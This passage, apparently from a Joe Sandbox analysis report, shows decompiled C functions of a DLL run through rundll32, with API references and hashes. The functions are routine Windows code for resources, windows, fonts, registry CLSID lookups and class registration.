                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,10012C1E,?,00000000,00000000,10042708,00000038,10012971,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 10018141
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,10012C1E,?,?,00000000), ref: 100181C2
                                                                        • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 100181DC
                                                                        • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 10018217
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: String$ByteCharMultiWide$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 1775797328-0
                                                                        • Opcode ID: 2a0531d2a3256dac13ccc396c07934314eadd6156838d5e530a716c7ff313fc5
                                                                        • Instruction ID: 011406151073c2933195e68419e397d46f3af982358df5fa752d459d02b2d26b
                                                                        • Opcode Fuzzy Hash: 2a0531d2a3256dac13ccc396c07934314eadd6156838d5e530a716c7ff313fc5
                                                                        • Instruction Fuzzy Hash: 3CB1467280025AEFDF12DFA0DC858DE7BB6FB09394F118229F910AA161D735DBA1DB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E1001F2DE(intOrPtr* __ecx) {
                                                                        				signed int _t45;
                                                                        				void* _t49;
                                                                        				CHAR* _t50;
                                                                        				signed int _t54;
                                                                        				signed char _t60;
                                                                        				struct HWND__* _t62;
                                                                        				CHAR* _t63;
                                                                        				signed int _t68;
                                                                        				struct HINSTANCE__* _t81;
                                                                        				void* _t83;
                                                                        				intOrPtr* _t85;
                                                                        				void* _t87;
                                                                        				void* _t89;
                                                                        
                                                                        				E10011BF0(0x1003a3e8, _t87);
                                                                        				_t85 = __ecx;
                                                                        				_t68 =  *(__ecx + 0x5c);
                                                                        				 *((intOrPtr*)(_t87 - 0x10)) = _t89 - 0x18;
                                                                        				 *((intOrPtr*)(_t87 - 0x1c)) = __ecx;
                                                                        				 *(_t87 - 0x18) =  *(__ecx + 0x58);
                                                                        				_t45 = E100373B5();
                                                                        				_t81 =  *(_t45 + 0xc);
                                                                        				if( *(_t85 + 0x54) != 0) {
                                                                        					_t81 =  *(E100373B5() + 0xc);
                                                                        					_t45 = LoadResource(_t81, FindResourceA(_t81,  *(_t85 + 0x54), 5));
                                                                        					 *(_t87 - 0x18) = _t45;
                                                                        				}
                                                                        				if( *(_t87 - 0x18) != 0) {
                                                                        					_t45 = LockResource( *(_t87 - 0x18));
                                                                        					_t68 = _t45;
                                                                        				}
                                                                        				if(_t68 != 0) {
                                                                        					 *(_t87 - 0x14) = E1001EE1E(_t85);
                                                                        					E10022196();
                                                                        					 *(_t87 - 0x20) =  *(_t87 - 0x20) & 0x00000000;
                                                                        					__eflags =  *(_t87 - 0x14);
                                                                        					if( *(_t87 - 0x14) != 0) {
                                                                        						_t62 = GetDesktopWindow();
                                                                        						__eflags =  *(_t87 - 0x14) - _t62;
                                                                        						if( *(_t87 - 0x14) != _t62) {
                                                                        							_t63 = IsWindowEnabled( *(_t87 - 0x14));
                                                                        							__eflags = _t63;
                                                                        							if(_t63 != 0) {
                                                                        								EnableWindow( *(_t87 - 0x14), 0);
                                                                        								 *(_t87 - 0x20) = 1;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					 *(_t87 - 4) =  *(_t87 - 4) & 0x00000000;
                                                                        					_push(_t85);
                                                                        					E100237EE();
                                                                        					_t49 = E100220EE(_t87,  *(_t87 - 0x14));
                                                                        					_push(_t81);
                                                                        					_push(_t49);
                                                                        					_push(_t68);
                                                                        					_t50 = E1001F0D1(_t85);
                                                                        					__eflags = _t50;
                                                                        					if(_t50 != 0) {
                                                                        						__eflags =  *(_t85 + 0x38) & 0x00000010;
                                                                        						if(( *(_t85 + 0x38) & 0x00000010) != 0) {
                                                                        							_t83 = 4;
                                                                        							_t60 = E100202AB(_t85);
                                                                        							__eflags = _t60 & 0x00000001;
                                                                        							if((_t60 & 0x00000001) != 0) {
                                                                        								_t83 = 5;
                                                                        							}
                                                                        							E10021B92(_t85, _t83);
                                                                        						}
                                                                        						__eflags =  *(_t85 + 0x1c);
                                                                        						if( *(_t85 + 0x1c) != 0) {
                                                                        							E100204FE(_t85, 0, 0, 0, 0, 0, 0x97);
                                                                        						}
                                                                        					}
                                                                        					 *(_t87 - 4) =  *(_t87 - 4) | 0xffffffff;
                                                                        					__eflags =  *(_t87 - 0x20);
                                                                        					if( *(_t87 - 0x20) != 0) {
                                                                        						EnableWindow( *(_t87 - 0x14), 1);
                                                                        					}
                                                                        					__eflags =  *(_t87 - 0x14);
                                                                        					if(__eflags != 0) {
                                                                        						__eflags = GetActiveWindow() -  *(_t85 + 0x1c);
                                                                        						if(__eflags == 0) {
                                                                        							SetActiveWindow( *(_t87 - 0x14));
                                                                        						}
                                                                        					}
                                                                        					 *((intOrPtr*)( *_t85 + 0x60))();
                                                                        					E1001EE58(_t85, __eflags);
                                                                        					__eflags =  *(_t85 + 0x54);
                                                                        					if( *(_t85 + 0x54) != 0) {
                                                                        						FreeResource( *(_t87 - 0x18));
                                                                        					}
                                                                        					_t54 =  *(_t85 + 0x40);
                                                                        				} else {
                                                                        					_t54 = _t45 | 0xffffffff;
                                                                        				}
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t87 - 0xc));
                                                                        				return _t54;
                                                                        			}

















                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 1001F2E3
                                                                        • FindResourceA.KERNEL32(?,00000000,00000005), ref: 1001F31B
                                                                        • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F323
                                                                          • Part of subcall function 10022196: UnhookWindowsHookEx.USER32(?), ref: 100221BB
                                                                        • LockResource.KERNEL32(00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F335
                                                                        • GetDesktopWindow.USER32 ref: 1001F362
                                                                        • IsWindowEnabled.USER32(00000000), ref: 1001F370
                                                                        • EnableWindow.USER32(00000000,00000000), ref: 1001F37F
                                                                        • EnableWindow.USER32(00000000,00000001), ref: 1001F40E
                                                                        • GetActiveWindow.USER32 ref: 1001F419
                                                                        • SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F427
                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F443
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeH_prologHookLoadLockUnhookWindows
                                                                        • String ID:
                                                                        • API String ID: 833315621-0
                                                                        • Opcode ID: 36a7553cafaefb879fb01c6852922989da2301ce548023a2a0f367a123b38a93
                                                                        • Instruction ID: 07bae71fa05b1da8482edcdebb19160d7d4844d0efed804ca524429d20d1f7a4
                                                                        • Opcode Fuzzy Hash: 36a7553cafaefb879fb01c6852922989da2301ce548023a2a0f367a123b38a93
                                                                        • Instruction Fuzzy Hash: D14190359007199FDB12DFA5C889BBEB7F5FF14751F10011DF102AA1A2CB74AA81CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E1002583A(void* _a4, intOrPtr _a8) {
                                                                        				void* _v8;
                                                                        				void* _v12;
                                                                        				int _v16;
                                                                        				char* _v20;
                                                                        				int _v24;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				signed int _t35;
                                                                        				void* _t37;
                                                                        				void* _t42;
                                                                        				int* _t43;
                                                                        
                                                                        				_t43 = 0;
                                                                        				_v12 = 0;
                                                                        				_v20 = E100017D0(_a8, 0x104);
                                                                        				_v16 = 0x104;
                                                                        				_t42 = RegOpenKeyA;
                                                                        				_v24 = 0;
                                                                        				if(RegOpenKeyA(0x80000000, ?str?,  &_v12) == 0) {
                                                                        					_push(_t37);
                                                                        					_v8 = 0;
                                                                        					if(RegOpenKeyA(_v12, _a4,  &_v8) == 0) {
                                                                        						_a4 = 0;
                                                                        						if(RegOpenKeyA(_v8, "InProcServer32",  &_a4) == 0) {
                                                                        							_t35 = RegQueryValueExA(_a4, 0x1003da51, 0,  &_v24, _v20,  &_v16);
                                                                        							asm("sbb esi, esi");
                                                                        							_t43 =  ~_t35 + 1;
                                                                        							RegCloseKey(_a4);
                                                                        						}
                                                                        						RegCloseKey(_v8);
                                                                        					}
                                                                        					RegCloseKey(_v12);
                                                                        					_pop(_t37);
                                                                        				}
                                                                        				E10006CE2(_t37, _a8, _t42, 0xffffffff);
                                                                        				return _t43;
                                                                        			}















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 10025872
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 10025886
                                                                        • RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 100258A1
                                                                        • RegQueryValueExA.ADVAPI32(?,1003DA51,00000000,?,?,?), ref: 100258BB
                                                                        • RegCloseKey.ADVAPI32(?), ref: 100258CB
                                                                        • RegCloseKey.ADVAPI32(?), ref: 100258D0
                                                                        • RegCloseKey.ADVAPI32(?), ref: 100258D5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpen$QueryValue
                                                                        • String ID: CLSID$InProcServer32
                                                                        • API String ID: 3523390698-323508013
                                                                        • Opcode ID: 0f9c6b5e3f4a76f5fb44a6b70cf5269a04b4aae784ef91a0774247bb7487627f
                                                                        • Instruction ID: 98c4733b419a9a9fcc8d3b331f1c0e54a211d8c73680194401ba1897b1518396
                                                                        • Opcode Fuzzy Hash: 0f9c6b5e3f4a76f5fb44a6b70cf5269a04b4aae784ef91a0774247bb7487627f
                                                                        • Instruction Fuzzy Hash: A511297680012DBFEF02EFA5CC80DEEBBB9EF446A0F114122FA05A6150D7719B51DBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10036531() {
                                                                        				struct HWND__* _v4;
                                                                        				void* _v68;
                                                                        				void* _v76;
                                                                        				int _t4;
                                                                        				int _t10;
                                                                        				struct HDC__* _t15;
                                                                        				void* _t18;
                                                                        
                                                                        				_t4 =  *0x1004b8cc; // 0xffffffff
                                                                        				if(_t4 == 0xffffffff) {
                                                                        					_t15 = GetDC(0);
                                                                        					_v4 = 0;
                                                                        					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
                                                                        					if(_t18 != 0) {
                                                                        						_v68 = SelectObject(_t15, _t18);
                                                                        					}
                                                                        					GetCharWidthA(_t15, 0x36, 0x36, 0x1004b8cc);
                                                                        					if(_t18 != 0) {
                                                                        						SelectObject(_t15, _v76);
                                                                        						DeleteObject(_t18);
                                                                        					}
                                                                        					ReleaseDC(0, _t15);
                                                                        					_t10 =  *0x1004b8cc; // 0xffffffff
                                                                        					return _t10;
                                                                        				}
                                                                        				return _t4;
                                                                        			}











                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 10036543
                                                                        • GetSystemMetrics.USER32 ref: 10036567
                                                                        • CreateFontA.GDI32(00000000,?,?,?,?,?,10036A10,?,?,?,?,?,?,?), ref: 1003656E
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 10036582
                                                                        • GetCharWidthA.GDI32(00000000,00000036,00000036,1004B8CC), ref: 10036592
                                                                        • SelectObject.GDI32(00000000,?), ref: 100365A1
                                                                        • DeleteObject.GDI32(00000000), ref: 100365A4
                                                                        • ReleaseDC.USER32 ref: 100365AC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                                                                        • String ID: Marlett
                                                                        • API String ID: 1397664628-3688754224
                                                                        • Opcode ID: 02a284a0c2a362a437aa0b11f12343519aacb4f4528957fd96303176c2f861e5
                                                                        • Instruction ID: 1088ce7175f154466d6028c012866e6bff604f09a65bd199e6d5657c5750c08b
                                                                        • Opcode Fuzzy Hash: 02a284a0c2a362a437aa0b11f12343519aacb4f4528957fd96303176c2f861e5
                                                                        • Instruction Fuzzy Hash: 5D014071542634BFE2269B668C8CD9B7FACEF467E5F104518F209DA152CB614900CBB4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 53%
                                                                        			E1003982F(void* __ecx) {
                                                                        				intOrPtr _t52;
                                                                        				intOrPtr _t53;
                                                                        				void* _t57;
                                                                        				CHAR* _t60;
                                                                        				CHAR* _t88;
                                                                        				CHAR* _t89;
                                                                        				void* _t102;
                                                                        				CHAR* _t103;
                                                                        				CHAR* _t105;
                                                                        				CHAR* _t106;
                                                                        				CHAR* _t107;
                                                                        				void* _t111;
                                                                        				short* _t112;
                                                                        				void* _t122;
                                                                        				void* _t127;
                                                                        				void* _t129;
                                                                        				void* _t131;
                                                                        
                                                                        				_t127 = _t129 - 0x8c;
                                                                        				_t52 =  *0x1004c470; // 0x1bfbe703
                                                                        				 *((intOrPtr*)(_t127 + 0x88)) = _t52;
                                                                        				_t53 =  *0x1004b0a0(_t111, _t122, _t102);
                                                                        				_t112 =  *((intOrPtr*)(_t127 + 0x94));
                                                                        				 *((intOrPtr*)(_t127 - 0x7c)) = _t53;
                                                                        				E10011C50(_t112, 0, 0x20);
                                                                        				_t103 =  *(_t127 + 0x98);
                                                                        				_t131 = _t129 - 0x10c + 0xc;
                                                                        				_t109 = _t103;
                                                                        				 *(_t127 - 0x80) = _t127 - 0x78;
                                                                        				if(E100244DE(_t103, 0x100410f8) == 0) {
                                                                        					_t109 = _t103;
                                                                        					_t57 = E100244DE(_t103, 0x1003d114);
                                                                        					_push(0x100);
                                                                        					_push(_t127 - 0x78);
                                                                        					if(_t57 == 0) {
                                                                        						_push(0xf108);
                                                                        						E100245D3();
                                                                        						 *_t112 = 0xf108;
                                                                        						L12:
                                                                        						_t60 = 0;
                                                                        						if( *(_t127 - 0x80) == 0) {
                                                                        							L14:
                                                                        							__imp__#2(_t60);
                                                                        							 *(_t112 + 8) = _t60;
                                                                        							if( *(_t112 + 4) == 0) {
                                                                        								_t106 =  *(E100373B5() + 0x10);
                                                                        								if(_t106 != 0) {
                                                                        									_t115 = lstrlenA(_t106) + 1;
                                                                        									E10010B20(lstrlenA(_t106) + 0x00000001 + lstrlenA(_t106) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
                                                                        									_t60 = E100067FA(_t131, _t106, _t115,  *((intOrPtr*)(_t127 - 0x7c)));
                                                                        									_t112 =  *((intOrPtr*)(_t127 + 0x94));
                                                                        								} else {
                                                                        									_t60 = 0;
                                                                        								}
                                                                        								__imp__#2(_t60);
                                                                        								 *(_t112 + 4) = _t60;
                                                                        							}
                                                                        							if( *(_t112 + 0xc) == 0 &&  *(_t112 + 0x10) != 0) {
                                                                        								_t105 =  *( *((intOrPtr*)(E100373B5() + 4)) + 0x60);
                                                                        								if(_t105 != 0) {
                                                                        									_t126 = lstrlenA(_t105) + 1;
                                                                        									E10010B20(lstrlenA(_t105) + 0x00000001 + lstrlenA(_t105) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
                                                                        									_t60 = E100067FA(_t131, _t105, _t126,  *((intOrPtr*)(_t127 - 0x7c)));
                                                                        								} else {
                                                                        									_t60 = 0;
                                                                        								}
                                                                        								__imp__#2(_t60);
                                                                        								 *(_t112 + 0xc) = _t60;
                                                                        							}
                                                                        							return E100117AE(_t60,  *((intOrPtr*)(_t127 + 0x88)));
                                                                        						}
                                                                        						L13:
                                                                        						_t117 = lstrlenA( *(_t127 - 0x80)) + 1;
                                                                        						E10010B20(lstrlenA( *(_t127 - 0x80)) + 0x00000001 + lstrlenA( *(_t127 - 0x80)) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
                                                                        						_t60 = E100067FA(_t131,  *(_t127 - 0x80), _t117,  *((intOrPtr*)(_t127 - 0x7c)));
                                                                        						_t112 =  *((intOrPtr*)(_t127 + 0x94));
                                                                        						goto L14;
                                                                        					}
                                                                        					_push(0xf10a);
                                                                        					E100245D3();
                                                                        					 *_t112 = 0xf10a;
                                                                        					goto L13;
                                                                        				}
                                                                        				 *(_t127 - 0x80) = _t103[0xc];
                                                                        				 *_t112 = _t103[8];
                                                                        				 *(_t112 + 0x10) = _t103[0x10];
                                                                        				 *(_t112 + 0x1c) = _t103[0x1c];
                                                                        				_t88 = _t103[0x14];
                                                                        				 *(_t127 + 0x98) = _t88;
                                                                        				if( *((intOrPtr*)(_t88 - 0xc)) != 0) {
                                                                        					if(_t88 != 0) {
                                                                        						_t121 = lstrlenA(_t88) + 1;
                                                                        						E10010B20(lstrlenA(_t88) + 0x00000001 + lstrlenA(_t88) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
                                                                        						_t88 = E100067FA(_t131,  *(_t127 + 0x98), _t121,  *((intOrPtr*)(_t127 - 0x7c)));
                                                                        						_t112 =  *((intOrPtr*)(_t127 + 0x94));
                                                                        					}
                                                                        					__imp__#2(_t88);
                                                                        					 *(_t112 + 0xc) = _t88;
                                                                        				}
                                                                        				_t107 = _t103[0x18];
                                                                        				_t89 = 0;
                                                                        				if( *((intOrPtr*)(_t107 - 0xc)) != 0) {
                                                                        					if(_t107 != 0) {
                                                                        						_t119 = lstrlenA(_t107) + 1;
                                                                        						E10010B20(lstrlenA(_t107) + 0x00000001 + lstrlenA(_t107) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
                                                                        						_t89 = E100067FA(_t131, _t107, _t119,  *((intOrPtr*)(_t127 - 0x7c)));
                                                                        						_t112 =  *((intOrPtr*)(_t127 + 0x94));
                                                                        					}
                                                                        					__imp__#2(_t89);
                                                                        					 *(_t112 + 4) = _t89;
                                                                        				}
                                                                        				goto L12;
                                                                        			}





















                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?,100410F8), ref: 100398BA
                                                                          • Part of subcall function 100067FA: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,?,?), ref: 1000681C
                                                                        • SysAllocString.OLEAUT32(?), ref: 100398E6
                                                                        • lstrlenA.KERNEL32(?,100410F8), ref: 100398FE
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 10039925
                                                                        • lstrlenA.KERNEL32(?,0000F108,?,00000100,1003D114,100410F8), ref: 10039973
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 1003999C
                                                                        • lstrlenA.KERNEL32(?), ref: 100399BC
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 100399E3
                                                                        • lstrlenA.KERNEL32(?), ref: 10039A0C
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 10039A2D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocStringlstrlen$ByteCharMultiWide
                                                                        • String ID:
                                                                        • API String ID: 2903237683-0
                                                                        • Opcode ID: d0e283d36d7e8a4e4201feedb9b32d85caebebb8c09a47d8d95a8ace7938a35f
                                                                        • Instruction ID: 094128f662b1ec739eea3e3cde0adae16dde2bfe5a7d45c4af97d4efa71afc42
                                                                        • Opcode Fuzzy Hash: d0e283d36d7e8a4e4201feedb9b32d85caebebb8c09a47d8d95a8ace7938a35f
                                                                        • Instruction Fuzzy Hash: A251A476900619EFDB20DF78CC85B8AB7B8FF09255F108526F519CB242DB74E950CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E1002F6AD(void* __ecx, int _a4) {
                                                                        				int _v8;
                                                                        				struct tagRECT _v24;
                                                                        				long _t39;
                                                                        				int _t42;
                                                                        				int _t43;
                                                                        				int _t62;
                                                                        				int _t66;
                                                                        				void* _t68;
                                                                        				long _t69;
                                                                        				int _t71;
                                                                        
                                                                        				_t69 = _a4;
                                                                        				_t68 = __ecx;
                                                                        				_t39 = DefWindowProcA( *(__ecx + 0x1c), 0x46, 0, _t69);
                                                                        				if(( *(_t69 + 0x18) & 0x00000001) == 0) {
                                                                        					GetWindowRect( *(_t68 + 0x1c),  &_v24);
                                                                        					_t42 = _a4;
                                                                        					_t66 =  *(_t42 + 0x10);
                                                                        					_t71 = _v24.right - _v24.left;
                                                                        					_t62 = _v24.bottom - _v24.top;
                                                                        					_t43 =  *(_t42 + 0x14);
                                                                        					_v8 = _t66;
                                                                        					_a4 = _t43;
                                                                        					if(_t66 != _t71 && ( *(_t68 + 0x7d) & 0x00000004) != 0) {
                                                                        						SetRect( &_v24, _t66 -  *0x1004efa0, 0, _t66, _t43);
                                                                        						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
                                                                        						SetRect( &_v24, _t71 -  *0x1004efa0, 0, _t71, _a4);
                                                                        						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
                                                                        						_t66 = _v8;
                                                                        						_t43 = _a4;
                                                                        					}
                                                                        					if(_t43 != _t62 && ( *(_t68 + 0x7d) & 0x00000008) != 0) {
                                                                        						SetRect( &_v24, 0, _t43 -  *0x1004efa4, _t66, _t43);
                                                                        						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
                                                                        						SetRect( &_v24, 0, _t62 -  *0x1004efa4, _v8, _t62);
                                                                        						_t43 = InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
                                                                        					}
                                                                        					return _t43;
                                                                        				}
                                                                        				return _t39;
                                                                        			}














                                                                        APIs
                                                                        • DefWindowProcA.USER32(?,00000046,00000000,?), ref: 1002F6C2
                                                                        • GetWindowRect.USER32 ref: 1002F6DA
                                                                        • SetRect.USER32 ref: 1002F714
                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 1002F723
                                                                        • SetRect.USER32 ref: 1002F73A
                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 1002F749
                                                                        • SetRect.USER32 ref: 1002F774
                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 1002F77F
                                                                        • SetRect.USER32 ref: 1002F796
                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 1002F7A1
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Invalidate$Window$Proc
                                                                        • String ID:
                                                                        • API String ID: 570070710-0
                                                                        • Opcode ID: c01845c7316c7950b7ef2fd5e5f7f0b699cb6ea0eaa739eb132b7bf5853a6ab6
                                                                        • Instruction ID: 759c21b255db7c4f0b51d9d2c83ad8eda26887521645a94a827a2b7369984522
                                                                        • Opcode Fuzzy Hash: c01845c7316c7950b7ef2fd5e5f7f0b699cb6ea0eaa739eb132b7bf5853a6ab6
                                                                        • Instruction Fuzzy Hash: C631C972900259BFEB01DFA5DD88FAE7BB8EB04344F504125FA01AB5A1D770AE54CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10020B9B() {
                                                                        				signed int _t39;
                                                                        				CHAR* _t43;
                                                                        				int _t44;
                                                                        				WNDCLASSA* _t63;
                                                                        				void* _t71;
                                                                        				void* _t73;
                                                                        
                                                                        				E10011BF0(0x1003a552, _t71);
                                                                        				_t63 =  *(_t71 + 8);
                                                                        				 *((intOrPtr*)(_t71 - 0x10)) = _t73 - 0x38;
                                                                        				if(GetClassInfoA(_t63->hInstance, _t63->lpszClassName, _t71 - 0x40) == 0) {
                                                                        					if(RegisterClassA(_t63) == 0) {
                                                                        						L5:
                                                                        						_t39 = 0;
                                                                        					} else {
                                                                        						 *(_t71 - 0x18) = 1;
                                                                        						if( *((char*)(E100373B5() + 0x14)) == 0) {
                                                                        							L10:
                                                                        							_t39 =  *(_t71 - 0x18);
                                                                        						} else {
                                                                        							E10037A1B(1);
                                                                        							 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
                                                                        							_t43 = E100373B5() + 0x34;
                                                                        							 *(_t71 - 0x14) = _t43;
                                                                        							_t44 = lstrlenA(_t43);
                                                                        							_t13 = lstrlenA(_t63->lpszClassName) + 2; // 0x2
                                                                        							if(_t44 + _t13 < 0x1000) {
                                                                        								 *(_t71 + 8) = lstrlenA( *(_t71 - 0x14));
                                                                        								if( *(_t71 + 8) + lstrlenA(_t63->lpszClassName) + 2 >= 0x1000) {
                                                                        									 *(_t71 - 0x18) =  *(_t71 - 0x18) & 0x00000000;
                                                                        									UnregisterClassA(_t63->lpszClassName, _t63->hInstance);
                                                                        								} else {
                                                                        									lstrcatA( *(_t71 - 0x14), _t63->lpszClassName);
                                                                        									 *(_t71 + 0xa) = 0xa;
                                                                        									 *((char*)(_t71 + 0xb)) = 0;
                                                                        									lstrcatA( *(_t71 - 0x14), _t71 + 0xa);
                                                                        								}
                                                                        								 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
                                                                        								E10037A7E(1);
                                                                        								goto L10;
                                                                        							} else {
                                                                        								goto L5;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					_t39 = 1;
                                                                        				}
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0xc));
                                                                        				return _t39;
                                                                        			}










                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
